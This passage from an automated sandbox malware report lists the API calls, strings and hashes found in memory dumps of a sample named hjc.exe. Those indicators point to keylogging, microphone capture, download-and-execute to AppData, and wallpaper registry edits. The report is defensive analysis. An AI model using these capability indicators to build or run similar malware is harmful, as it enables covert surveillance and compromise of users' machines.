                                                                                                                                                                                    • _free.LIBCMT ref: 15CF09E6
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF09F8
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0A0A
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0A1C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 3271039a35e4cd5048c85130796a042a55e45005baafabf093f8f1b238f84633
                                                                                                                                                                                    • Instruction ID: f3efa475433ebd44126708ca8a6418b70793e55da073a0429b41ab1801123ae5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3271039a35e4cd5048c85130796a042a55e45005baafabf093f8f1b238f84633
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F0F43662922467C650DE6CE4C1D5A77E9FE00B127508D06E466E7600DE34FDC147A4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15CA6FBC
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 15CA70A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\hjc.exe$open
                                                                                                                                                                                    • API String ID: 2825088817-1832149388
                                                                                                                                                                                    • Opcode ID: 23df34abdc99f5c9dd8435bf32228c4266ec60a4081bf04f0482ccde45b3c06e
                                                                                                                                                                                    • Instruction ID: 7fc60cd1e3a818eac73117f9c48019c890f3afbeb3c2e4c30bd4af270e88b74f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23df34abdc99f5c9dd8435bf32228c4266ec60a4081bf04f0482ccde45b3c06e
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1617F3BB042035ACF14EE74CDA49AE7BE9AFD1590F800D1DA55757285FF24B909C3A2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0323AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0323AAEB
                                                                                                                                                                                      • Part of subcall function 0323A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                                    • Opcode ID: 159593ffdeac737ee529aca471548cb1c1f16afd227b631eb39d2c80c1180fd5
                                                                                                                                                                                    • Instruction ID: 0b8faffe7797943ebbfdec7ff5c192d925445788ed4c488ad4b5d6a41b0120d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 159593ffdeac737ee529aca471548cb1c1f16afd227b631eb39d2c80c1180fd5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0341C5F87342054BC711FBAD89802BEF29BDB97200B5849B5D4C1CB354D6B8DDC29661
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15CA18BE
                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 15CA18F6
                                                                                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 15CA1A04
                                                                                                                                                                                      • Part of subcall function 15CD4770: __onexit.LIBCMT ref: 15CD4776
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                    • String ID: 045
                                                                                                                                                                                    • API String ID: 1649129571-917703510
                                                                                                                                                                                    • Opcode ID: 8b9821fb9e9c989d867952adfd1b05a0e17adbfafdbd588d27a225a442d88bdd
                                                                                                                                                                                    • Instruction ID: 613c3063969a90db77143367b2ef3dbfe2e004adcf8a8773337e226dc4336a29
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9821fb9e9c989d867952adfd1b05a0e17adbfafdbd588d27a225a442d88bdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29418F3B6143629AC714DF28DED4AAEBBA6AF80355F400D19E546861D0FF307946C752
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32 ref: 15CBCAD7
                                                                                                                                                                                      • Part of subcall function 15CB376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,15D0611C), ref: 15CB377E
                                                                                                                                                                                      • Part of subcall function 15CB376F: RegSetValueExA.ADVAPI32(15D0611C,?,00000000,?,00000000,00000000), ref: 15CB37A6
                                                                                                                                                                                      • Part of subcall function 15CB376F: RegCloseKey.ADVAPI32(15D0611C), ref: 15CB37B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                                                    • Opcode ID: 0bb3d98e240fce05b214ccd5507486f3453d9c9d8090e7b5e4a793f00e1b7b75
                                                                                                                                                                                    • Instruction ID: 6d445db041aa5fab1cadeab872ac42e113adf051d7e5b39b9f96e153f76dde94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bb3d98e240fce05b214ccd5507486f3453d9c9d8090e7b5e4a793f00e1b7b75
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA1130B3B5421163D8047979CE67FAE2C16D352A91F800959E9023F7D6E8C35A5583E3
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA27D,15D150F0,00000000,00000000), ref: 15CAA1FE
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA267,15D150F0,00000000,00000000), ref: 15CAA20E
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA289,15D150F0,00000000,00000000), ref: 15CAA21A
                                                                                                                                                                                      • Part of subcall function 15CAB164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                      • Part of subcall function 15CAB164: wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                                                                                    • Opcode ID: 4980b75d893fb65704e17cca312a1a92be48ec446345d1402672ba1534bfbb31
                                                                                                                                                                                    • Instruction ID: cb85aed1f9dd289d0a2ce3b87d3c8161981919842b8b36db71e79f9a55e8ce0a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4980b75d893fb65704e17cca312a1a92be48ec446345d1402672ba1534bfbb31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 531151BB20021A7E9624BF79DC85CEB7E6DDA81198B400E19F94612141FE617D54CAF2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CAB164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                      • Part of subcall function 15CAB164: wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA267,?,00000000,00000000), ref: 15CAAF6E
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA289,?,00000000,00000000), ref: 15CAAF7A
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CAA295,?,00000000,00000000), ref: 15CAAF86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                                                                                    • Opcode ID: 33ce1bb5587fd1e0054ca371d6c96205b542419c36a3f174c355cf05725858ef
                                                                                                                                                                                    • Instruction ID: 32d601e05b3ce32e4ea3c7c2397e66100670faa78fec954b1b91f245260fa7c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33ce1bb5587fd1e0054ca371d6c96205b542419c36a3f174c355cf05725858ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001C4BA70026A3AE6247E798C89CBF7E6EDA81098B400D59F94612141FD923C49C7F2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 15CA4F81
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 15CA4FCD
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CA5150,?,00000000,00000000), ref: 15CA4FE0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 15CA4F94
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                    • API String ID: 2532271599-1507639952
                                                                                                                                                                                    • Opcode ID: 78a3f294a671b9c65f7c6d7dca852d083891d5df7a2d5ad885a29290075884e1
                                                                                                                                                                                    • Instruction ID: 0a9aa68727d5462095d4e266006f7b64f2787493376057f1ea28ae054c6ec167
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a3f294a671b9c65f7c6d7dca852d083891d5df7a2d5ad885a29290075884e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F11C63A9042D56BDB20AEB6CC49EDFBFB89BD2750F04494EE44153240EBB56045CBB2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(00320500,00000020,?), ref: 15CA1849
                                                                                                                                                                                    • waveInAddBuffer.WINMM(00320500,00000020), ref: 15CA185F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                    • String ID: 045$jZos
                                                                                                                                                                                    • API String ID: 2315374483-3270310240
                                                                                                                                                                                    • Opcode ID: e4e141064f56bd0e77d37cfa391ed6f73780f7e8792771bd428132829997a482
                                                                                                                                                                                    • Instruction ID: cc85078bb3028686d207181e87cb812d0102c9e30b691954fd9d18b93ff2a894
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e141064f56bd0e77d37cfa391ed6f73780f7e8792771bd428132829997a482
                                                                                                                                                                                    • Instruction Fuzzy Hash: B80178B6710322AFDB108F69DCC8A65BFB9FF88290700052AE405C7701EF316C21CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,15D0611C), ref: 15CB377E
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(15D0611C,?,00000000,?,00000000,00000000), ref: 15CB37A6
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(15D0611C), ref: 15CB37B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                                    • String ID: Control Panel\Desktop
                                                                                                                                                                                    • API String ID: 1818849710-27424756
                                                                                                                                                                                    • Opcode ID: bf929970e97fba3f68a86a64da6a1c2bd9284121db1f525718fe7ab602922020
                                                                                                                                                                                    • Instruction ID: 207745da15143e964a064d8d7f14996c1a5ea0775587b65570d9ff6b161bc1d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf929970e97fba3f68a86a64da6a1c2bd9284121db1f525718fe7ab602922020
                                                                                                                                                                                    • Instruction Fuzzy Hash: 90F06D76500128BBCF009FA0DD55EEA3B7CEF48A90F104555FD05A6010EB31AE14DB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 15CD52B7
                                                                                                                                                                                      • Part of subcall function 15CD524D: std::exception::exception.LIBCONCRT ref: 15CD525A
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 15CD52C5
                                                                                                                                                                                      • Part of subcall function 15CD9126: RaiseException.KERNEL32(?,?,15CD52CA,?,15D16B50,045,00000000,?,?,?,?,15CD52CA,?,15D0E508,?), ref: 15CD9185
                                                                                                                                                                                      • Part of subcall function 15CD5B78: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 15CD5B85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalExceptionException@8InitializeRaiseSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                    • String ID: 0/5$045
                                                                                                                                                                                    • API String ID: 2106822824-1284902932
                                                                                                                                                                                    • Opcode ID: cb345c4950d08b3f658bad838a6bbe67c492e2509b988e121e0b7d907c285302
                                                                                                                                                                                    • Instruction ID: d95dd6e10f9b6c62f5d907aacb1392ffee98a0fa710122f452b1cd9c79ef8032
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb345c4950d08b3f658bad838a6bbe67c492e2509b988e121e0b7d907c285302
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83E0926BE10318278A00A97DAC488CEB3BD9D610117410866EF11E6100EE60B94A86D4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 03247A09
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 03247A0F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03247A04
                                                                                                                                                                                    • NtProtectVirtualMemory, xrefs: 032479FF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                                                                                                    • Opcode ID: 1a7ab2b5c89ecb28188669b492999bef56e7f339ff771c15c064662eb24bb349
                                                                                                                                                                                    • Instruction ID: 63b5f1b5f0b5463e5999937b7a1443bb66fd5dfe6f873df96c105c30fc1494a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a7ab2b5c89ecb28188669b492999bef56e7f339ff771c15c064662eb24bb349
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E0BFB525021D7F8B40EFACDC85D8F37DCAB1D2407008001BB28D7601C6B5E5519FB4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0325A10B,00000000,0325A11E), ref: 0323C436
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0325A10B,00000000,0325A11E), ref: 0323C447
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                                    • Opcode ID: 70143f20264d0ab9fca2643656cee5024aab17a6210bbdbfa49ad433a94a1e0e
                                                                                                                                                                                    • Instruction ID: 827d1e9a09326609bc3967a10818741177ed75f0b5fb65a214bb1a5083ce8734
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70143f20264d0ab9fca2643656cee5024aab17a6210bbdbfa49ad433a94a1e0e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86D0A7F1A6032A5FDB00FAB574CC63962EC9307701F00F028E31279509C6B5C8C08F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                                                    • Instruction ID: aa20698677eae580e701bfb28f9af982d8dfd6ab262ad9a9854495770fd0d908
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99A16636A043869FD712CF5CCC85BAEBFE1FF11310F14496ED989AB281C6B9A981C750
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 612978ab0d669fe69c38abb4dcfd58aecbbaf9b98c2716f0c6fe660a084a9b87
                                                                                                                                                                                    • Instruction ID: 2962364c7fb4d6fcc12407f0bb946b87193c78c2d4839676f2b697b35c489f16
                                                                                                                                                                                    • Opcode Fuzzy Hash: 612978ab0d669fe69c38abb4dcfd58aecbbaf9b98c2716f0c6fe660a084a9b87
                                                                                                                                                                                    • Instruction Fuzzy Hash: C341E477B00344AFD3249F78CC40B9ABFEAEB88710F104A2AE155DB690DA71F95187D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,15D14F50), ref: 15CA4DB3
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,15D14EF8,00000000,00000000), ref: 15CA4DC7
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 15CA4DD2
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4DDB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3360349984-0
                                                                                                                                                                                    • Opcode ID: 2160cca20faf1cee96beb141721d42f683869acb945a70888d3418db745ad412
                                                                                                                                                                                    • Instruction ID: fa90a2ca5e07069f3df441c851a5850503a95fd714443c30926731b497d5dd7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2160cca20faf1cee96beb141721d42f683869acb945a70888d3418db745ad412
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8141507B608356ABC714EF61CD94DAFBBADAF94650F400D1DF49282190EF24B909CA61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

